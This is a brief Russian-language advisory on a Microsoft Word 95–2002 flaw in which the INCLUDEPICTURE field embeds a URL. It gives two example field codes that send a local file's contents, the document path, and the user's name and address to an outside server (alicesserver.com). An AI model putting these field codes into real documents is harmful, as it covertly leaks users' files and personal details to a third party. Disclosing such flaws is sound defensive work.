Поле INCLUDEPICTURE используется для внедрения URL в документ. Если INCLUDEPICTURE включен в документ и ссылается на URL, то атакующий может получить содержание файлов на системе пользователя. Пример: 

{INCLUDEPICTURE {QUOTE «http:\\www.alicesserver.com\» & {FILENAME \p} & {INCLUDETEXT
"c:\\a.txt"}} \d } 
{INCLUDEPICTURE {QUOTE «http:\\www.alicesserver.com\» & {USERNAME} & {USERADDRESS } } \d}

Уязвимость обнаружена в Microsoft Word 2000, 2002, 95, 97.



Оставить мнение